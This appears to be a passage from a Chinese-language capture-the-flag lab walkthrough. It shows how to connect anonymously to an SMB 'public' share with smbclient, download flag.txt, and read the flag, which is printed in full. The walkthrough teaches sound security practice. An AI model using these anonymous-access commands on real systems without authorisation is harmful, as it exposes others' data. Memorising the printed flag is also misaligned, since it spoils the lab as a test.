探索目标系统并定位 Flag
在最后这一步中,你将连接到你发现的 public 共享并搜索 flag。这模拟了后渗透阶段,攻击者在此阶段搜索有价值的数据。
使用 smbclient 直接连接到 public 共享,同样使用 -N 标志进行匿名访问:
smbclient //target/public -N
成功连接后,你将进入一个 smbclient 提示符,看起来像 smb: \>。你现在正在浏览远程文件共享。
Try "help" to get a list of possible commands.
smb: \>
使用 ls 命令列出共享的内容:
ls
你应该会看到列出的 flag.txt 文件。
smb: \> ls
. D 0 Fri Sep 19 10:29:39 2025
.. D 0 Fri Sep 19 10:29:39 2025
flag.txt N 29 Fri Sep 19 10:29:39 2025
40901312 blocks of size 1024. 22067688 blocks available
现在,使用 get 命令将文件下载到你的本地机器:
get flag.txt
注意:smbclient 实用程序没有内置的 cat 命令来直接查看文件内容。你必须先使用 get 下载文件。
下载完成后,输入 exit 退出 smbclient 会话。最后,在你的本地终端使用 cat 命令显示下载的 flag 的内容。
cat flag.txt
终端将显示 flag 的值。
labex{smb_gu3st_acc3ss_fl4g}
恭喜!你已成功枚举了 SMB 服务,利用了访客访问的错误配置,并检索到了 flag。复制 flag 值以完成实验。